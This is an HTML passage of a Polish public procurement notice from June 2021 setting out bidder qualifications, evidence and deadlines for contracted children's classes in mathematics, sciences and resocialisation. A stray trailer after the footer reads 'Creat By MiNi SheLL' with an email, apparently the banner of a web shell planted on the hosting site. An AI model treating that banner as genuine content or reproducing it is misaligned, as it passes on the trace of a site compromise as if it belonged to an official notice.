class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki<br/>udziału dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający odstąpił od określenia warunków udziału w postępowaniu w tym zakresie<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający odstąpił od określenia warunków udziału w postępowaniu w tym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający odstąpił od określenia warunków udziału w postępowaniu w tym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek jeżeli wykaże, że:<br/>CZĘŚĆ I<br/>a) wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie<br/>ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, co najmniej jedną usługę, polegającą na organizacji zajęć<br/>dydaktycznych dla dzieci, na kwotę nie mniejszą niż 50.000,00 złotych brutto,<br/>b) dysponuje wymienionymi poniżej osobami przewidzianymi do realizacji zamówienia lub<br/>przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia wymienionych poniżej<br/>osób, przewidzianych do realizacji zamówienia, które będą uczestniczyły w realizacji<br/>zamówienia, tj. co najmniej 1 osobą:<br/>- posiadającą wykształcenie wyższe (min. 1 stopnia) z zakresu matematyki, lub posiadającą inne<br/>studia i ukończone studia podyplomowe nadające kwalifikację do nauczania matematyki,<br/>- posiadająca przygotowanie pedagogiczne do nauczania przedmiotów,<br/>- posiadająca co najmniej 3-letnie doświadczenie w pracy z dziećmi o charakterze dydaktycznym<br/>w zakresie matematyki,<br/>- posiadająca umiejętność dostosowania metod pracy do dzieci o różnym poziomie wiedzy i<br/>umiejętności,<br/>- posiadająca kompetencje do pracy z dziećmi o szczególnych potrzebach edukacyjnych;<br/>CZĘŚĆ II<br/>c) wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie<br/>ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, co najmniej jedną usługę, polegającą na organizacji zajęć<br/>dydaktycznych dla dzieci, na kwotę nie mniejszą niż 50.000,00 złotych brutto,<br/>d) dysponuje wymienionymi poniżej osobami przewidzianymi do realizacji zamówienia lub<br/>przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia wymienionych poniżej<br/>osób, przewidzianych do realizacji zamówienia, które będą uczestniczyły w realizacji<br/>zamówienia, tj. co najmniej 1 osobą:<br/>- posiadającą wykształcenie wyższe (min. 1 stopnia) z zakresu matematyki, lub posiadającą inne<br/>studia i ukończone studia podyplomowe nadające kwalifikację do nauczania matematyki, oraz<br/>posiadającą co najmniej 3-letnie doświadczenie w pracy z dziećmi o charakterze dydaktycznym<br/>w zakresie matematyki,<br/>- posiadającą wykształcenie wyższe (min. 1 stopnia) z zakresu fizyki, lub posiadającą inne studia<br/>i ukończone studia podyplomowe nadające kwalifikację do nauczania fizyki, oraz posiadającą co<br/>najmniej 3-letnie doświadczenie w pracy z dziećmi o charakterze dydaktycznym w zakresie<br/>fizyki,<br/>- posiadającą wykształcenie wyższe (min. 1 stopnia) z zakresu chemii, lub posiadającą inne<br/>studia i ukończone studia podyplomowe nadające kwalifikację do nauczania chemii oraz<br/>posiadającą co najmniej 3-letnie doświadczenie w pracy z dziećmi o charakterze dydaktycznym<br/>w zakresie chemii<br/>- posiadająca przygotowanie pedagogiczne do nauczania przedmiotów,<br/>- posiadająca umiejętność dostosowania metod pracy do dzieci o różnym poziomie wiedzy i<br/>umiejętności,<br/>- posiadająca kompetencje do pracy z dziećmi o szczególnych potrzebach edukacyjnych;<br/>Zamawiający dopuszcza możliwość zatrudnienia min. 1 osoby spełniającej łącznie powyższe<br/>wymagania.<br/>CZĘŚĆ III<br/>e) wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie<br/>ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, co najmniej jedną usługę, polegającą na organizacji zajęć<br/>dydaktycznych dla dzieci, na kwotę nie mniejszą niż 20.000,00 złotych brutto,<br/>f) dysponuje wymienionymi poniżej osobami przewidzianymi do realizacji zamówienia lub<br/>przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia wymienionych poniżej<br/>osób, przewidzianych do realizacji zamówienia, które będą uczestniczyły w realizacji<br/>zamówienia, tj. co najmniej 1 osobą:<br/>- posiadającą wykształcenie wyższe na kierunku pedagogika resocjalizacyjna lub socjoterapia,<br/>lub ukończone studia na dowolnym kierunku i studia podyplomowe na kierunku pedagogika<br/>resocjalizacyjna lub socjoterapia lub kurs kwalifikacyjny resocjalizacji lub socjoterapii, lub<br/>ukończony zakład kształcenia nauczycieli w specjalności resocjalizacja lub socjoterapia, lub<br/>ukończony zakład kształcenia nauczycieli w dowolnej specjalności i kurs kwalifikacyjny w<br/>zakresie resocjalizacji lub socjoterapii,<br/>- posiadająca przygotowanie pedagogiczne,<br/>- posiadająca co najmniej 3-letnie doświadczenie w pracy z rodzina i dzieckiem, w tym z<br/>rodzinami z problemami opiekuńczo-wychowawczymi,<br/>- posiadająca umiejętność diagnozy trudności i problemów dziecka,<br/>- posiadająca umiejętność dostosowania metod pracy do dzieci o różnym poziomie wiedzy i<br/>umiejętności,<br/>CZĘŚĆ IV<br/>g) wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie<br/>ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, co najmniej jedną usługę, polegającą na organizacji zajęć<br/>dydaktycznych dla dzieci, na kwotę nie mniejszą niż 20.000,00 złotych brutto,<br/>h) dysponuje wymienionymi poniżej osobami przewidzianymi do realizacji zamówienia lub<br/>przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia wymienionych poniżej<br/>osób, przewidzianych do realizacji zamówienia, które będą uczestniczyły w realizacji<br/>zamówienia, tj. co najmniej 1 osobą:<br/>- posiadającą wykształcenie wyższe na kierunku pedagogika resocjalizacyjna lub socjoterapia,<br/>lub ukończone studia na dowolnym kierunku i studia podyplomowe na kierunku pedagogika<br/>resocjalizacyjna lub socjoterapia lub kurs kwalifikacyjny resocjalizacji lub socjoterapii, lub<br/>ukończony zakład kształcenia nauczycieli w specjalności resocjalizacja lub socjoterapia, lub<br/>ukończony zakład kształcenia nauczycieli w dowolnej specjalności i kurs kwalifikacyjny w<br/>zakresie resocjalizacji lub socjoterapii,<br/>- posiadająca przygotowanie pedagogiczne,<br/>- posiadająca co najmniej 3-letnie doświadczenie w pracy z rodzina i dzieckiem, w tym z<br/>rodzinami z problemami opiekuńczo-wychowawczymi,<br/>- posiadająca umiejętność diagnozy trudności i problemów dziecka,<br/>- posiadająca umiejętność nawiązywania i budowania relacji z odbiorca zajęć,<br/>- posiadająca umiejętność dostosowania metod i technik pracy do potrzeb i możliwości odbiorcy.<br/>Uwaga: Zamawiający wymaga od wykonawców wskazania w ofercie imienia i nazwiska<br/>powyższych osób wraz z informacją o doświadczeniu tej osoby w celu przyznania punktów w kryterium oceny ofert. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>zamawiającego, o których mowa w:<br/>− art. 108 ust. 1 pkt 3 ustawy PZP,<br/>− art. 108 ust. 1 pkt 4 ustawy PZP, dotyczących orzeczenia zakazu ubiegania się o zamówienie<br/>publiczne tytułem środka zapobiegawczego,<br/>− art. 108 ust. 1 pkt 5 ustawy PZP, dotyczących zawarcia z innymi wykonawcami porozumienia<br/>mającego na celu zakłócenie konkurencji,<br/>− art. 108 ust. 1 pkt 6 ustawy PZP,<br/>− art. 109 ust. 1 pkt 1 ustawy PZP, odnośnie do naruszenia obowiązków dotyczących płatności<br/>podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 roku o podatkach i<br/>opłatach lokalnych (Dz. U. z 2020 r., poz. 106 ze zm.), według wzoru stanowiącego załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się<br/>lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności<br/>jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na<br/>rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających,<br/>czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa,<br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały<br/>wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane. Jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów -<br/>oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wystawione w okresie ostatnich 3 miesięcy – według wzoru stanowiącego załącznik nr 5 do SWZ;<br/>b) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami – według wzoru stanowiącego załącznik nr 6 do SWZ;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy<br/>CZĘŚĆ I - warunek, o którym mowa w:<br/>1) pkt 1 ppkt 4 lit. a SWZ - zostanie spełniony wyłącznie jeżeli jeden z Wykonawców lub podmiotów udostępniających zasoby spełni warunek samodzielnie. Nie sumuje się doświadczenia zawodowego – argumentacja na podstawie sentencji wyroku Krajowej Izby Odwoławczej z dnia 7 sierpnia 2014 roku (sygn. akt: KIO 1495/14);<br/>2) pkt 1 ppkt 4 lit. b SWZ – chociaż jeden z Wykonawców lub podmiotów udostępniających<br/>zasoby spełni warunek samodzielnie lub łącznie spełnią warunek.<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy CZĘŚCI II - warunek, o którym mowa w:<br/>1) pkt 1 ppkt 4 lit. c SWZ - zostanie spełniony wyłącznie jeżeli jeden z Wykonawców lub podmiotów udostępniających zasoby spełni warunek samodzielnie. Nie sumuje się doświadczenia zawodowego – argumentacja na podstawie sentencji wyroku Krajowej Izby Odwoławczej z dnia 7 sierpnia 2014 roku (sygn. akt: KIO 1495/14);<br/>2) pkt 1 ppkt 4 lit. d SWZ – chociaż jeden z Wykonawców lub podmiotów udostępniających<br/>zasoby spełni warunek samodzielnie lub łącznie spełnią warunek.<br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy<br/>CZĘŚCI III - warunek, o którym mowa w:<br/>1) pkt 1 ppkt 4 lit. e SWZ - zostanie spełniony wyłącznie jeżeli jeden z Wykonawców lub<br/>podmiotów udostępniających zasoby spełni warunek samodzielnie. Nie sumuje się doświadczenia zawodowego – argumentacja na podstawie sentencji wyroku Krajowej Izby Odwoławczej z dnia 7 sierpnia 2014 roku (sygn. akt: KIO 1495/14);<br/>2) pkt 1 ppkt 4 lit. f SWZ – chociaż jeden z Wykonawców lub podmiotów udostępniających<br/>zasoby spełni warunek samodzielnie lub łącznie spełnią warunek.<br/>6. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy<br/>CZĘŚCI IV - warunek, o którym mowa w:<br/>1) pkt 1 ppkt 4 lit. g SWZ - zostanie spełniony wyłącznie jeżeli jeden z Wykonawców lub<br/>podmiotów udostępniających zasoby spełni warunek samodzielnie. Nie sumuje się<br/>doświadczenia zawodowego – argumentacja na podstawie sentencji wyroku Krajowej Izby<br/>Odwoławczej z dnia 7 sierpnia 2014 roku (sygn. akt: KIO 1495/14);<br/>2) pkt 1 ppkt 4 lit. h SWZ – chociaż jeden z Wykonawców lub podmiotów udostępniających<br/>zasoby spełni warunek samodzielnie lub łącznie spełnią warunek.<br/>7. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są<br/>wymagane.<br/>8. W przypadku, o którym mowa w pkt 7, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają<br/>poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do treści tej umowy, zawarto w załączniku nr 8 do SIWZ.<br/>2. Zamawiający przewiduje możliwość dokonania istotnych zmian umowy w stosunku do treści<br/>oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z Projektowanymi postanowienia umowy i Ustawą Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-12 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-25 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com